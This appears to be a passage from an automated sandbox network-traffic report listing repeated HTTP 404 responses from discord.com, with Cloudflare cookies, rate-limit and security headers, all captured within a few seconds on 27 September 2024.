Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2dbb081e7cec11efa56b768b656d6a57; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tesq4q%2Fof5N%2FfOFagtamVLpkr6i9eeYF3bBeKAbDld1TyVPqX%2FHpV3t4la270yHU9z4nH4mjDEsQYdhSuHpvNeiOwxwIZDqBxVyhGAw0rfVPAivJJDrvTLEDPNPz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2dbb081e7cec11efa56b768b656d6a57312e2dc54f683e071f75ea25684146e12ad81c1e4d85666697e737dad60ad7b1; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e1d43587cec11efaceb3afbab16203a; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jcsZ632z4wAIayU2OyvV%2BxWivQLiijJaTylQFpILiWNmiohksX1E%2FSbLTnddCUoGmWYRI9Q%2FJCzEAlAhm2BPPucdNJ4fObq0OMSaVdmH%2BJBUtkDuGM5dQJghEC5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e1d43587cec11efaceb3afbab16203a57f8b4487d16c7ea1e5af554e299d0a89a98c2725a43224f2fef5231ab51d425; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e25bae27cec11efba92de6f7e04d91f; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453931x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFPou7Ly7EDyqnIeOmgLepZnN4qr4%2FDnPO4qKzS7fJE3FX8ptyTUiLopbsveCR1hjF3sctXpnzMhxRiXzJj324dOVk3J%2Fq%2BvE0y14AkezjGAdEjlI9ucHxkDN86d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e25bae27cec11efba92de6f7e04d91f7cc0110f1e71e2488bdd99cb271f4663c7c2ab2858b5b61a107ad4fd00dcf7ad; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e8e70147cec11efa1e1a6a6d338c935; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453932x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ui0h6LY2TA975PP8hrbL6Rn9ed5x4e4A%2F4iYiZNAZxOhND%2BBUzXoNM%2BqomWdmTF%2F0OzbxZnSaOsqZb%2FqL%2BlEfWU7OXyAYITzA7f7WHeod8vdS13GHA5tw4wVfA0L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e8e70147cec11efa1e1a6a6d338c935d787564224f81a52ba35e29a80bd3a864c9f3775dde1657035d4b8bbe7a36439; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:50 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e9d8b4e7cec11ef852fbe573e76249d; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453932x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0wrL88lead%2Fx6hy8klXu4pPvtZEpI%2F0pDKopLHw7GL6t456npHX5FKS22j%2Fn1G7kDjndp3k%2Fn8tw9CSDRAW5YKwd6MTMDvLkYb5mIMuFWbfrOOH%2FtntcWm5HgTF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e9d8b4e7cec11ef852fbe573e76249d67437e93f77931898004f1f78a6698ac2ddbba2c8d61e800e8f47dcd5912d425; Expires=Wed, 26-Sep-2029 16:18:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=73103136ee7e8e53491775a072108632c5d8fb76-1727453930; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2ef510087cec11ef9c0d124b36f1d382; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oa0d3H%2B2YNBcftR3sjRCw%2FQB3NzMr0%2BeVBIlEkEODQGnMrwzoBzx7WtEGb26CEgkh0bCcwHPDczW5MHbCmM9HhP2eIBRk7Oj1zW3w%2B3Dg2yAN1KyrFnKIs5Qw9gW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2ef510087cec11ef9c0d124b36f1d3829bb0bb8cb584b865e3ac91dbc57d16d57a1b6b8c5f5ac0ee510533934fed87c6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2f047d047cec11ef85ed067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 2via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxf253Q498%2FMMLryXIURf%2B7xKpYrAu88NpKMZTHnsiTA8b7tZYPo66pv%2B0cD8zA9TkbicREVvlXnoTvFNjya6MFVdkcjtFjlk%2Fruiz%2BKMvxtZYSzH59Nca222zzx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2f047d047cec11ef85ed067ba21bebfe0e5f5f20399985eeec12c0af5433f1f82f9e8a371b829c6091a4ab9a85478bd6; Expires=Wed, 26-Sep-2029 16:18:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b9abd809e0334626dff7c87e6434dc816a7033f1-1727453931; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2f6b5cf47cec11efb5ce16ad33b060f2; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453933x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3v%2Fgm%2FLVLFrHt9jdiQQvhGAvpqWdgmBYIsdriniRJOg3qteo5M0aZ9PdLhHvvSzcu4u2HyMGVdIZcef0oBWKdPanu7Ggc9tDbJeCFPHk3QtckzkduAWwJezubJ0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2f6b5cf47cec11efb5ce16ad33b060f2963a185fec13ac46aeceda20083a51363540c29048eb5cd51caff213e9f6819f; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:52 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2fd62f207cec11ef9478bec7e893c0ff; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1727453934x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu7Yqqwp7%2Bs2PSW5ZKNTIvzzPQP%2BbyqMy4bhi5pb2BOcSVoEp6DesiB6lZ6NZNEQxvrh8Hvg2zSlCzYV4ZF%2F07nQOi7tVyB4axRe8c%2F0vkP5YF26vHfk4o2hksl4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2fd62f207cec11ef9478bec7e893c0ff677f20117665331703391b771d5fb5f5649ddefc0a99d4b96ef86586658d0d02; Expires=Wed, 26-Sep-2029 16:18:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6a9f61f54c68ada5aae4c2e5f45fd9d07ebfdfbb-1727453932; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=303ad38a7cec11ef894692cc3f667719; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453934x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QShPN%2FNf9IrmsETLd0ehwwIZZwBvBfju7kwZ89KsrZNl1IcCMbbO9m2EJ%2BZ5GdeB2D3Rs1LNXKoqZLvuWge4U7UntwlhP3pg44V561WKk830wsLkLJyQHOetI8EH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=303ad38a7cec11ef894692cc3f667719703d78845b9d2992d263c75fbc29682aa9f61d3feb155da2059d4a5c293e7801; Expires=Wed, 26-Sep-2029 16:18:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=8d94676341efb39bad306ebb92a7fe1d375736b4-1727453933; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:54 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=30a3d9207cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453935x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3uW8mhJQe3h6mjBPduwb7BN%2Bz7PDOoy0%2FruhAfZcAjpA8YDgxhTfgHXlMFvLkQm4gngaZlaprYk0m9N7F3ERT0c7KVLFJSjSGQ0WdUxpNdnXGOW7xjj2TjWbJ%2F%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=30a3d9207cec11ef96902e88ff694586d92bddde534c181d0b626fe8b7577f54e6bd291a31ce00edc8bf56a23921a6ef; Expires=Wed, 26-Sep-2029 16:18:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7ad43c1cb07092dd708b3c6e0f1bdcacbed004e5-1727453934; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:57 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=329b7f587cec11ef8759067ba21bebfe; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453938x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=weV7j%2B%2Fcm0bfSD3Kn5sHq07M%2B6lbS%2FhKRcUWz6GP83C28ALA2TC5IRp1Lnk%2FvXKu7XEUfSZdbjm%2F9wbpO9eAUdfRwHnrRcLpwbE2MFiD9lvZPxM5vDfOXpI8UQi%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=329b7f587cec11ef8759067ba21bebfed62991a5c924e1de9d3ff54e7f992b67e3ad9dec8eea5d81c7fdcb92c1cf2105; Expires=Wed, 26-Sep-2029 16:18:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=8e1ec1b277cf704c68f172d827a97e5d2a5c3a4f-1727453937; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:58 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=330b72687cec11ef9d31a6b2eb948c40; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453939x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aqWDRFTvp7syoDR0H0EdkpPkq3D6OAiDbXYchTpVg1lH%2FyKK23Jg8JVi4zzOfjiOU2VkxUu%2FiviTs%2BWpF77UbgrKT78LhNpFboinuacLDIMb7OSPGJ8LlTrFbJmH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=330b72687cec11ef9d31a6b2eb948c403f464fd8fe449b60da10b36b6a4d7712c0782e29ea00433a3fce18170ff87869; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:58 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3373e0aa7cec11efb69c0e478e5d82a7; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453940x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E6JgMhDovB4s%2Fqu%2BJZullT8n%2BwHKbJcn3kZhxpXnvc3fa1TJ9y%2FeZ4cxlc1s8jSaPbpV0qIbnFfs1G8nI%2B9tbaWi%2B8NdUhlK05jQUIogMItQdqxJgplU3GKx1Lzj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3373e0aa7cec11efb69c0e478e5d82a7b55a41caa7f284bfb007246733a54c791206f9615674ad856e7525e21bb19b34; Expires=Wed, 26-Sep-2029 16:18:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=91e624c7b228afc6fcf83acd401688349adc8fc6-1727453938; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:18:59 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=33dc716a7cec11ef890f96ff52647fd0; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453940x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPeZZdHiAL4LQe81%2B6lNMjplFr7IRKU57LCtkAiCXxOEsMSGoJckKZmAGjtXlSF8nSWG9pmlT7tGv9VcVg3S7e4fO%2B1K04nLUgleimJPiEv8DYqH4XYMgJZXN9SP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=33dc716a7cec11ef890f96ff52647fd0765c1bad81131c38e995494547fec0b7c3e82588608aa36ea38fba7f4e69523c; Expires=Wed, 26-Sep-2029 16:18:59 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5021d9c541e5ec266375367b8a579b9688877fb3-1727453939; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:00 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=34574a527cec11efa2060e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453941x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GunBpw3H93FVr7nxI3vW7UWUSuJqVO2CDJFBsYOURr30lgS4j2kSaKca8KnZKv8PUtU2PNeMfdfw4iS4KU1fzdd6HV1jMXtvWxRLm2zmvvs6u5Fy47rHLV8EdIP6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=34574a527cec11efa2060e62cbdde76223474cb28fd6dbbf2103019ed06984a82fe56697383b506ece1febe3e8d3e11f; Expires=Wed, 26-Sep-2029 16:19:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=7affd72039bfc759ddd7d629cf7feaa78cb7e6c9-1727453940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:01 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=34bf85b87cec11efb41b16ad33b060f2; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453942x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jDmJdrMNV2xiJYzH2lNiDU3R8dCJjfGmlMoVL9FYDsu5amF4pHIxWZJjTtELnaGaMZWwHEA2FMPI2WIHbyAdLscMxY3U4KWklJCHvn4OZhDk2DreENz3p85d%2BJDA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=34bf85b87cec11efb41b16ad33b060f2b95a6d5062626dde94c14e84002967a5fb0b075e1e482e91ac2d49e42de876ee; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 16:19:01 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=3534f97e7cec11ef93886a726fe7a83e; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1727453943x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cRk6kaTaqqq5uXKTyOTn7IDbhJ5cFsLSEk01TjECb4HNyXfPUhfoY%2BJVdEAKutQc%2BC07B0Z8NTq6WgGfiEtxF3soYpk6UeT36fjAy%2BkoSAgofzpPYxGek87BJAro"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=3534f97e7cec11ef93886a726fe7a83e1c137929250cb519ca8b91474352381d171f4301648df8ec637c694a9b75e94a; Expires=Wed, 26-Sep-2029 16:19:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=fbe7f0d857c54826245c4e0cf497aa483d23d881-1727453941; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
